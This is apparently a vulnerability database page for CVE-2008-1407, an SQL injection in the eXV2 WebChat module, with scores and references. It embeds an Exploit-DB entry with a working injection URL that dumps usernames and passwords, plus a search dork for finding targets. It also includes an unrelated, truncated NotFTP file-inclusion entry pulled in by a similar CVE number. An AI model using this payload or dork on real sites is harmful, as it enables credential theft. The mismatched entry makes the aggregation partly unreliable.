CVE-2008-1407
published 2008-03-20CVE-2008-1407: SQL injection vulnerability in index.php in the WebChat 1.60 module for eXV2 allows remote attackers to execute arbitrary SQL commands via the roomid parameter.
PriorityP335medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.6th percentile
SQL injection vulnerability in index.php in the WebChat 1.60 module for eXV2 allows remote attackers to execute arbitrary SQL commands via the roomid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exv2 | exv2 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NotFTP 1.3.1 - 'newlang' Local File Inclusion
exploitdb·2009-04-21
CVE-2009-1407 NotFTP 1.3.1 - 'newlang' Local File Inclusion
NotFTP 1.3.1 - 'newlang' Local File Inclusion
---
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: [email protected]
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
No writeups or analysis indexed.
http://secunia.com/advisories/29390http://www.securityfocus.com/bid/28256https://exchange.xforce.ibmcloud.com/vulnerabilities/41213https://www.exploit-db.com/exploits/5255http://secunia.com/advisories/29390http://www.securityfocus.com/bid/28256https://exchange.xforce.ibmcloud.com/vulnerabilities/41213https://www.exploit-db.com/exploits/5255
2008-03-20
Published